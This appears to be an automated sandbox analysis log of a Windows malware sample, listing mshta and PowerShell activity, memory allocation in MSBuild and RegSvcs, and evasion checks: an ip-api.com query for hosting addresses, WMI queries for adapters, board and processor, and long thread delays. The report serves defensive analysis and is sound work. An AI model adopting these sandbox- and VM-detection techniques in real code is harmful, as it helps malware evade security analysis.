Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 10B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 4D30000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 1770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 33C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 53C0000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599388	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599260	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598826	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597951	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596044	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595936	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595815	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595592	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595458	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594992	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594710	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4844	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5033	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3261	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6566	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4553
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4354
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5459

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2428	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7588	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599388	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599260	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598826	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597951	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596044	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595936	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595815	Jump to behavior
